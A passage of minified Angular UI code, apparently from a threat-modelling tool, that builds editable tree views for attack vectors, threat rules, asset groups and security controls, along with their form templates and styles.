0:e.data)instanceof tM?this.selectedNode.data:null}get selectedAttackVector(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof zp?this.selectedNode.data:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(d,T,k,q)=>{let Y={name:()=>d.Name,canSelect:!0,data:d,canRename:!0,onRename:te=>{d.Name=te},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(d).subscribe(te=>{te&&(this.dataService.Config.DeleteAttackVector(d),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let te=this.dataService.Config.CreateAttackVector(T);te.CopyFrom(d.Data),te.Name=te.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(te),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let te=T.Data.attackVectorIDs;if(0!=te.findIndex(pe=>pe==d.ID)){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe-1,1)[0]),k.children.splice(pe,0,k.children.splice(pe-1,1)[0])}},onMoveDown:()=>{let te=T.Data.attackVectorIDs;if(te.findIndex(pe=>pe==d.ID)!=te.length-1){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe+1,1)[0]),k.children.splice(pe,0,k.children.splice(pe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>q.filter(te=>te!=k),onMoveToGroup:te=>{let pe="attackVectorIDs";T.Data[pe].splice(T.Data[pe].indexOf(d.ID),1),te.data.Data[pe].push(d.ID),this.createNodes()}};return Y},n=(d,T,k,q)=>{let Y={name:()=>d.Name,canSelect:!0,data:d,canAdd:!0,addOptions:[this.translate.instant("general.Group"),this.translate.instant("general.AttackVector")],onAdd:te=>{let pe=null;pe=te==this.translate.instant("general.Group")?this.dataService.Config.CreateAttackVectorGroup(d):this.dataService.Config.CreateAttackVector(d),this.createNodes(),setTimeout(()=>{this.selectedNode=this.FindNodeOfObject(pe),this.selectedNode.isRenaming=!0},100)},canRename:!0,onRename:te=>{d.Name=te},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(d).subscribe(te=>{te&&(this.dataService.Config.DeleteAttackVectorGroup(d),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let te=T.Data.attackVectorGroupIDs;if(0!=te.findIndex(pe=>pe==d.ID)){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe-1,1)[0]),k.children.splice(pe,0,k.children.splice(pe-1,1)[0])}},onMoveDown:()=>{let te=T.Data.attackVectorGroupIDs;if(te.findIndex(pe=>pe==d.ID)!=te.length-1){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe+1,1)[0]),k.children.splice(pe,0,k.children.splice(pe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>q.filter(te=>te!=Y&&te!=k),onMoveToGroup:te=>{let pe="attackVectorGroupIDs";T.Data[pe].splice(T.Data[pe].indexOf(d.ID),1),te.data.Data[pe].push(d.ID),this.createNodes()}};return d.SubGroups.forEach(te=>{let pe=n(te,d,Y,q);Y.children.push(pe)}),d.AttackVectors.forEach(te=>Y.children.push(i(te,d,Y,q))),q.push(Y),Y},c=n(this.dataService.Config.ThreatLibrary,null,null,[]);c.icon="library_books",c.canSelect=!1,c.canDelete=!1,c.addOptions=null,c.canRename=!1,c.hasMenu=!0,this.Nodes.push(c),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-library"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],[3,"attackVector"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"]],template:function(e,i){1&e&&ne(0,Dft,9,3,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Ri,an,Ta,Ea,nn,un,Go,Xa,jg,Xi],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}"]}),t})();function wft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",4),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"textarea",5),he("ngModelChange",function(n){return be(e),Me(B(2).selectedThreatRuleGroup.Description=n)}),u(),s(9,"\n    "),u(),s(10,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedThreatRuleGroup.Description)}}function Ift(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-checkbox",6),he("change",function(n){return be(e),Me(B(2).OnRulesActiveChange(n.checked))}),s(3),oe(4,"translate"),u(),s(5,"\n  "),Mt()}if(2&t){const e=B(2);C(2),V("checked",e.allGroupRulesActive)("indeterminate",e.someGroupRulesActive),C(1),ke(re(4,3,"properties.IsActive"))}}function Rft(t,a){if(1&t&&it(0,"app-threat-rule",7),2&t){const e=B(2);V("node",e.selectedNode)("threatRule",e.selectedThreatRule)}}function Sft(t,a){if(1&t&&(m(0,"div",1),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,wft,11,5,"ng-container",2),s(6,"\n  "),s(7,"\n  "),ne(8,Ift,6,5,"ng-container",2),s(9,"\n  "),ne(10,Rft,1,2,"app-threat-rule",3),s(11,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.selectedThreatRuleGroup),C(3),V("ngIf",e.selectedThreatRuleGroup),C(2),V("ngIf",e.selectedThreatRule)}}let kft=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,i.ConfigChanged.subscribe(c=>this.createNodes())}get selectedThreatRuleGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof aM?this.selectedNode.data:null}get selectedThreatRule(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Fp?this.selectedNode.data:null}get allGroupRulesActive(){return!!this.selectedThreatRuleGroup&&this.selectedThreatRuleGroup.ThreatRules.every(e=>e.IsActive)}get someGroupRulesActive(){return!(!this.selectedThreatRuleGroup||this.allGroupRulesActive)&&this.selectedThreatRuleGroup.ThreatRules.length>0&&this.selectedThreatRuleGroup.ThreatRules.some(e=>e.IsActive)}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}OnRulesActiveChange(e){this.selectedThreatRuleGroup&&this.selectedThreatRuleGroup.ThreatRules.forEach(i=>i.IsActive=e)}createNodes(){const e=this.Nodes;if(this.Nodes=[],!this.dataService.Config)return;let i=(k,q,Y,te)=>{let pe={name:()=>k.Name,canSelect:!0,data:k,canRename:!0,onRename:Re=>{k.Name=Re},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(k).subscribe(Re=>{Re&&(this.dataService.Config.DeleteThreatRule(k),this.selectedNode==pe&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let Re=this.dataService.Config.CreateThreatRule(q,on.DFD);Re.CopyFrom(k.Data),Re.Name=Re.Name+"-Copy",this.dataService.Config.GetThreatRuleGroups().find(Fe=>Fe.ThreatRules.includes(k)).AddThreatRule(Re),this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Re=q.Data.threatRuleIDs;if(0!=Re.findIndex(Fe=>Fe==k.ID)){let Fe=Re.findIndex(Ne=>Ne==k.ID);Re.splice(Fe,0,Re.splice(Fe-1,1)[0]),Y.children.splice(Fe,0,Y.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=q.Data.threatRuleIDs;if(Re.findIndex(Fe=>Fe==k.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne==k.ID);Re.splice(Fe,0,Re.splice(Fe+1,1)[0]),Y.children.splice(Fe,0,Y.children.splice(Fe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>te.filter(Re=>Re!=Y),onMoveToGroup:Re=>{let Fe="threatRuleIDs";q.Data[Fe].splice(q.Data[Fe].indexOf(k.ID),1),Re.data.Data[Fe].push(k.ID),this.createNodes()}};return pe},n=(k,q,Y,te)=>{let pe={name:()=>k.Name,canSelect:!0,data:k,canAdd:!0,addOptions:[this.translate.instant("general.Group"),this.translate.instant("general.ThreatRule")],onAdd:Re=>{let Fe=null;Fe=Re==this.translate.instant("general.Group")?this.dataService.Config.CreateThreatRuleGroup(k):this.dataService.Config.CreateThreatRule(k,on.DFD),this.createNodes(),setTimeout(()=>{this.selectedNode=this.FindNodeOfObject(Fe),this.selectedNode.isRenaming=!0},100)},canRename:!0,onRename:Re=>{k.Name=Re},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(k).subscribe(Re=>{Re&&(this.dataService.Config.DeleteThreatRuleGroup(k),this.selectedNode==pe&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let Re=q.Data.threatRuleGroupIDs;if(0!=Re.findIndex(Fe=>Fe==k.ID)){let Fe=Re.findIndex(Ne=>Ne==k.ID);Re.splice(Fe,0,Re.splice(Fe-1,1)[0]),Y.children.splice(Fe,0,Y.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=q.Data.threatRuleGroupIDs;if(Re.findIndex(Fe=>Fe==k.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne==k.ID);Re.splice(Fe,0,Re.splice(Fe+1,1)[0]),Y.children.splice(Fe,0,Y.children.splice(Fe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>te.filter(Re=>Re!=pe&&Re!=Y),onMoveToGroup:Re=>{let Fe="threatRuleGroupIDs";q.Data[Fe].splice(q.Data[Fe].indexOf(k.ID),1),Re.data.Data[Fe].push(k.ID),this.createNodes()}};return k.SubGroups.forEach(Re=>{let Fe=n(Re,k,pe,te);pe.children.push(Fe)}),k.ThreatRules.forEach(Re=>pe.children.push(i(Re,k,pe,te))),te.push(pe),pe},r=[],c=n(this.dataService.Config.DFDThreatRuleGroups,null,null,r);c.icon="compare_arrows",c.canSelect=!1,c.canDelete=!1;let d=n(this.dataService.Config.StencilThreatRuleGroups,null,null,r);d.icon="view_module",d.canSelect=!1,d.canDelete=!1,d.canAdd=!1;let T=n(this.dataService.Config.ComponentThreatRuleGroups,null,null,r);T.icon="code",T.canSelect=!1,T.canDelete=!1,T.canAdd=!1,this.Nodes.push(c),this.Nodes.push(d),this.Nodes.push(T),this.Nodes.forEach(k=>k.hasMenu=!0),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-rules"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],[3,"node","threatRule",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["color","primary",3,"checked","indeterminate","change"],[3,"node","threatRule"]],template:function(e,i){1&e&&ne(0,Sft,12,4,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Ri,an,Ta,Ea,br,nn,un,Go,Xa,qp,Xi]}),t})();function Pft(t,a){if(1&t){const e=Ye();m(0,"button",19),he("click",function(){return be(e),Me(B(3).selectedAssetGroup.Name="")}),oe(1,"translate"),s(2,"\n        "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n      "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Oft(t,a){1&t&&(m(0,"mat-hint",23),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n        ",re(2,1,"messages.error.numberAlreadyExists"),"\n      "))}function Nft(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",20),s(1,"\n      "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n      "),m(6,"input",21),he("ngModelChange",function(n){return be(e),Me(B(3).selectedAssetGroup.Number=n)}),u(),s(7,"\n      "),ne(8,Oft,3,3,"mat-hint",22),s(9,"\n    "),u()}if(2&t){const e=B(3);C(3),ke(re(4,4,"general.Number")),C(3),at("matTooltip",e.selectedAssetGroup.Number),V("ngModel",e.selectedAssetGroup.Number),C(2),V("ngIf",e.selectedAssetGroup.CheckUniqueNumber())}}function Lft(t,a){if(1&t){const e=Ye();m(0,"table",24),s(1,"\n        "),m(2,"tr")(3,"td")(4,"mat-checkbox",25),he("change",function(){const r=be(e).$implicit,c=B(3);return Me(c.ImpactCatChanged(c.selectedAssetGroup,r))}),s(5),oe(6,"translate"),u()()(),s(7,"\n      "),u()}if(2&t){const e=a.$implicit,i=B(3);C(4),V("checked",i.selectedAssetGroup.ImpactCats.includes(e)),C(1),ke(re(6,2,i.GetImpactCategoryName(e)))}}function zft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",10),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"input",11),he("ngModelChange",function(n){return be(e),Me(B(2).selectedAssetGroup.Name=n)}),u(),s(9,"\n      "),ne(10,Pft,6,3,"button",12),s(11,"\n    "),u(),s(12,"\n    "),ne(13,Nft,10,6,"mat-form-field",13),s(14,"\n    "),it(15,"br"),s(16,"\n    "),m(17,"mat-form-field",14),s(18,"\n      "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n      "),m(23,"textarea",15),he("ngModelChange",function(n){return be(e),Me(B(2).selectedAssetGroup.Description=n)}),u(),s(24,"\n    "),u(),s(25,"\n    "),m(26,"mat-checkbox",16),he("ngModelChange",function(n){return be(e),Me(B(2).selectedAssetGroup.IsActive=n)}),s(27),oe(28,"translate"),u(),s(29,"\n    "),m(30,"h3"),s(31),oe(32,"translate"),u(),s(33,"\n    "),m(34,"div",17),s(35,"\n      "),ne(36,Lft,8,4,"table",18),s(37,"\n    "),u(),s(38,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,13,"general.Name")),C(3),at("matTooltip",e.selectedAssetGroup.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedAssetGroup.Name),C(2),V("ngIf",e.selectedAssetGroup.Name),C(3),V("ngIf",e.selectedAssetGroup.IsNewAsset),C(7),ke(re(21,15,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedAssetGroup.Description),C(3),V("ngModel",e.selectedAssetGroup.IsActive),C(1),ke(re(28,17,"properties.IsActive")),C(4),ke(re(32,19,"properties.ImpactCategories")),C(5),V("ngForOf",e.GetImpactCategories())}}function Wft(t,a){if(1&t){const e=Ye();m(0,"button",34),he("click",function(){const r=be(e).$implicit,c=B().item;return Me(B(3).OnMoveToGroup(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.Name)}}function Fft(t,a){if(1&t&&(s(0,"\n              "),ne(1,Wft,2,1,"button",33),s(2,"\n            ")),2&t){const e=a.groups;C(1),V("ngForOf",e)}}const Vft=function(t,a){return{groups:t,item:a}};function Bft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",26),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedMyData=r)}),s(1,"\n          "),m(2,"mat-icon",27),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",28),s(6),u(),s(7,"\n          "),m(8,"div",28),s(9),oe(10,"translate"),oe(11,"translate"),u(),s(12,"\n          "),m(13,"button",29),oe(14,"translate"),m(15,"mat-icon"),s(16,"low_priority"),u()(),s(17,"\n          "),m(18,"button",30),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteMyData(r))}),oe(19,"translate"),m(20,"mat-icon"),s(21,"delete"),u()(),s(22,"\n          "),m(23,"mat-menu",null,31),s(25,"\n            "),ne(26,Fft,3,1,"ng-template",32),s(27," \n          "),u(),s(28,"\n        "),u()}if(2&t){const e=a.$implicit,i=Ti(24),n=B(2);Ct("highlight-light",n.selectedMyData===e&&!n.theme.IsDarkMode)("highlight-dark",n.selectedMyData===e&&n.theme.IsDarkMode),at("matTooltip",null==e?null:e.Name),C(6),ke(e.Name),C(3),za("",re(10,12,"properties.Sensitivity"),": ",re(11,14,n.GetSensitivity(e.Sensitivity)),""),C(4),at("matTooltip",re(14,16,"nav-tree.moveToGroup")),V("matMenuTriggerFor",i)("matMenuTriggerData",Ah(20,Vft,n.GetMoveToGroups(e),e)),C(5),at("matTooltip",re(19,18,"general.Delete"))}}function Hft(t,a){if(1&t&&(bt(0),s(1,"\n        "),m(2,"div",35),s(3,"\n          "),it(4,"app-mydata",36),s(5,"\n        "),u(),s(6,"\n      "),Mt()),2&t){const e=B(2);C(4),V("myData",e.selectedMyData)}}function Uft(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),ne(2,zft,39,21,"ng-container",2),s(3,"\n  "),m(4,"div",3),s(5,"\n    "),m(6,"div",4),s(7,"\n      "),m(8,"mat-list",5),he("cdkDropListDropped",function(n){be(e);const r=B();return Me(r.dropWrapper(n,r.selectedAssetGroup.AssociatedData))}),s(9,"\n        "),m(10,"div",6),s(11),oe(12,"translate"),m(13,"button",7),he("click",function(){return be(e),Me(B().AddMyData())}),oe(14,"translate"),m(15,"mat-icon"),s(16,"add"),u()()(),s(17,"\n        "),ne(18,Bft,29,23,"mat-list-item",8),s(19,"\n      "),u(),s(20,"\n    "),u(),s(21,"\n    "),m(22,"div",9),s(23,"\n      "),ne(24,Hft,7,1,"ng-container",2),s(25,"\n    "),u(),s(26,"\n  "),u(),s(27,"\n"),u()}if(2&t){const e=B();C(2),V("ngIf",e.selectedAssetGroup),C(6),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),ct("",re(12,9,"general.Datas")," "),C(2),at("matTooltip",re(14,11,"general.Add")),C(5),V("ngForOf",e.selectedAssetGroup.AssociatedData),C(6),V("ngIf",null==e.selectedAssetGroup.AssociatedData?null:e.selectedAssetGroup.AssociatedData.includes(e.selectedMyData))}}let DZ=(()=>{class t extends xa{constructor(e,i,n){super(),this.theme=e,this.dataService=i,this.dialog=n,this.selectedMyData=null,i.ConfigChanged.subscribe(r=>this.createNodes())}get selectedAssetGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Zl?this.selectedNode.data:null}ngOnInit(){null==this.isProject&&console.error("isProject is unset"),setTimeout(()=>{this.createNodes()},100)}AddMyData(){let e;e=this.isProject?this.dataService.Project.CreateMyData(this.selectedAssetGroup):this.dataService.Config.CreateMyData(this.selectedAssetGroup),this.selectedMyData=e}DeleteMyData(e){this.isProject?this.dataService.Project.DeleteMyData(e):this.dataService.Config.DeleteMyData(e),this.selectedMyData==e&&(this.selectedMyData=null)}GetMoveToGroups(e){return this.assetGroup.GetGroupsFlat().filter(i=>!i.AssociatedData.includes(e))}OnMoveToGroup(e,i){this.assetGroup.GetGroupsFlat().find(r=>r.AssociatedData.includes(e)).RemoveMyData(e),i.AddMyData(e)}dropWrapper(e,i){let n=i.map(c=>c.ID);Qs(n,e.previousIndex,e.currentIndex);let r=[];n.forEach(c=>r.push(i.find(d=>d.ID==c))),this.selectedAssetGroup.AssociatedData=r}GetSensitivity(e){return An.ToString(e)}ImpactCatChanged(e,i){const n=e.ImpactCats.indexOf(i);n>=0?e.ImpactCats.splice(n,1):e.ImpactCats.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=null;i=this.isProject?this.dataService.Project:this.dataService.Config;let n=(r,c,d,T)=>{let k={name:()=>r.Name,canSelect:!0,canAdd:!0,isInactive:()=>!r.IsActive,data:r,onAdd:()=>{let q=i.CreateAssetGroup(r);this.createNodes(),this.selectedNode=this.FindNodeOfObject(q),this.selectedNode.isRenaming=!0},canRename:!0,onRename:q=>{r.Name=q},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(r).subscribe(q=>{q&&(i.DeleteAssetGroup(r),this.selectedNode==k&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let q=c.Data.assetGroupIDs;if(0!=q.findIndex(Y=>Y==r.ID)){let Y=q.findIndex(te=>te==r.ID);q.splice(Y,0,q.splice(Y-1,1)[0]),d.children.splice(Y,0,d.children.splice(Y-1,1)[0])}},onMoveDown:()=>{let q=c.Data.assetGroupIDs;if(q.findIndex(Y=>Y==r.ID)!=q.length-1){let Y=q.findIndex(te=>te==r.ID);q.splice(Y,0,q.splice(Y+1,1)[0]),d.children.splice(Y,0,d.children.splice(Y+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>T.filter(q=>q!=k&&q!=d),onMoveToGroup:q=>{let Y="assetGroupIDs";c.Data[Y].splice(c.Data[Y].indexOf(r.ID),1),q.data.Data[Y].push(r.ID),this.createNodes()}};return this.isProject&&r.IsNewAsset&&(k.icon="add_circle_outline",k.iconAlignLeft=!0),null==k.isExpanded&&!r.IsActive&&(k.isExpanded=!1),r.SubGroups.forEach(q=>{let Y=n(q,r,k,T);k.children.push(Y)}),T.push(k),k};if(this.assetGroup){let c=n(this.assetGroup,null,null,[]);c.icon=Zl.Icon,c.iconAlignLeft=!1,c.canDelete=!1,c.hasMenu=!0,this.Nodes.push(c),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-assets"]],inputs:{assetGroup:"assetGroup",isProject:"isProject"},features:[ci],decls:1,vars:1,consts:[["style","margin: 10px;",4,"ngIf"],[2,"margin","10px"],[4,"ngIf"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill","style","width: 70px; float: right; margin-left: 10px;",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["color","primary",3,"ngModel","ngModelChange"],[2,"margin-top","10px","display","flex","flex-wrap","wrap"],["style","min-width: 200px;",4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["appearance","fill",2,"width","70px","float","right","margin-left","10px"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],[1,"alert","alert-danger",2,"color","red"],[2,"min-width","200px"],["color","primary",3,"checked","change"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],["moveMenu","matMenu"],["matMenuContent",""],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["mat-menu-item","",3,"click"],[2,"margin-left","10px"],[3,"myData"]],template:function(e,i){1&e&&ne(0,Uft,28,13,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Zi,Ri,an,Ac,Ta,gm,Dd,Ea,Sd,kd,oa,br,da,nn,fp,un,jr,Go,Xa,ts,is,Or,Lr,rc,Xo,qo,po,el,Pa,v5,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function qft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",4),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"textarea",5),he("ngModelChange",function(n){return be(e),Me(B(2).selectedControlGroup.Description=n)}),u(),s(9,"\n    "),u(),s(10,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedControlGroup.Description)}}function Gft(t,a){if(1&t&&it(0,"app-control",6),2&t){const e=B(2);V("node",e.selectedNode)("control",e.selectedControl)}}function jft(t,a){if(1&t&&(m(0,"div",1),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,qft,11,5,"ng-container",2),s(6,"\n  "),ne(7,Gft,1,2,"app-control",3),s(8,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.selectedControlGroup),C(2),V("ngIf",e.selectedControl)}}let Qft=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,i.ConfigChanged.subscribe(c=>this.createNodes())}get selectedControlGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Yb?this.selectedNode.data:null}get selectedControl(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Wg?this.selectedNode.data:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(d,T,k,q)=>{let Y={name:()=>d.Name,canSelect:!0,data:d,canRename:!0,onRename:te=>{d.Name=te},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(d).subscribe(te=>{te&&(this.dataService.Config.DeleteControl(d),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let te=this.dataService.Config.CreateControl(T);te.CopyFrom(d.Data),te.Name=te.Name+"-Copy",this.dataService.Config.GetControlGroups().find(pe=>pe.Controls.includes(d)).AddControl(te),this.createNodes(),this.selectedNode=this.FindNodeOfObject(te),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let te=T.Data.controlIDs;if(0!=te.findIndex(pe=>pe==d.ID)){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe-1,1)[0]),k.children.splice(pe,0,k.children.splice(pe-1,1)[0])}},onMoveDown:()=>{let te=T.Data.controlIDs;if(te.findIndex(pe=>pe==d.ID)!=te.length-1){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe+1,1)[0]),k.children.splice(pe,0,k.children.splice(pe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>q.filter(te=>te!=k),onMoveToGroup:te=>{let pe="controlIDs";T.Data[pe].splice(T.Data[pe].indexOf(d.ID),1),te.data.Data[pe].push(d.ID),this.createNodes()}};return Y},n=(d,T,k,q)=>{let Y={name:()=>d.Name,canSelect:!0,data:d,canAdd:!0,addOptions:[this.translate.instant("general.Group"),this.translate.instant("general.Control")],onAdd:te=>{let 